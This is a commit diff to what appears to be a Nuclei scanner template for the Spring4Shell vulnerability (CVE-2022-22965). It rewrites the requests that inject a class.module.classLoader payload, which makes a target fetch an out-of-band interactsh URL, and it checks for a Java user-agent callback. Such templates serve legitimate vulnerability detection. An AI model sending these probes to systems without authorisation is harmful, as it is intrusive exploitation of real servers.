Updated CVE-2022-22965.yaml

2022-08-09 10:58:38 +08:00 · 2022-08-09 10:58:38 +08:00 · 3a82423598
parent 276f851e3c
commit 3a82423598
1 changed files with 12 additions and 14 deletions
--- a/cves/2022/CVE-2022-22965.yaml
+++ b/cves/2022/CVE-2022-22965.yaml
@ -21,19 +21,19 @@ info:
  tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev

 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx"
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded

-  - method: POST
-    path:
-      - "{{BaseURL}}"
+        class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx

-    headers:
-      Content-Type: application/x-www-form-urlencoded
-
-    body: |
-      class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
+      - |
+        GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
+    payloads:
+      interact_protocol:
+        - http
+        - https

    matchers-condition: and
    matchers:
@ -46,6 +46,4 @@ requests:
        part: interactsh_request
        words:
          - "User-Agent: Java"
-        case-insensitive: true
-
-# Enhanced by mp on 2022/05/19
+        case-insensitive: true